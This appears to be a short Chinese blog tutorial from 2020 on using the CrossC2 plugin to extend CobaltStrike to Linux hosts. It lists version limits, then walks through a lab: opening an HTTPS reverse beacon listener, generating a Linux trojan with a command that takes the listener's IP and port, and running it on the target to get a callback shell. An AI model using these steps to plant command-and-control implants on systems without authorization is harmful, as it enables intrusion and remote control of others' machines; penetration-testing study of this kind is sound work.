CobaltStrike上线Linux主机(CrossC2)

一、简述

CrossC2插件是为企业和红队人员提供的安全框架,支持 CobaltStrike 对其他平台的渗透测试(Linux / MacOS /...),支持自定义模块,并包括一些常用的渗透模块。

利用CrossC2插件通过在Linux上执行木马反弹一个CobaltStrike类型的shell。

CrossC2插件项目地址:https://github.com/gloxec/CrossC2

受限描述:

  • CobaltStrike:目前仅支持 cs 3.14版本,4.0可上线无法执行其他操作。

  • Linux:对于特别旧的系统,您可以在 can 中选择"Linux-GLIBC"选项(2010 年左右)

  • MacOS:最新系统仅支持 64 位程序

二、实验

1.genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

2.由于 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中选择HTTPS进行监听,
服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

3.生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

4.执行木马上线

成功上线

posted @ 2020-07-15 23:45  micr067  阅读(6099)  评论(0编辑  收藏  举报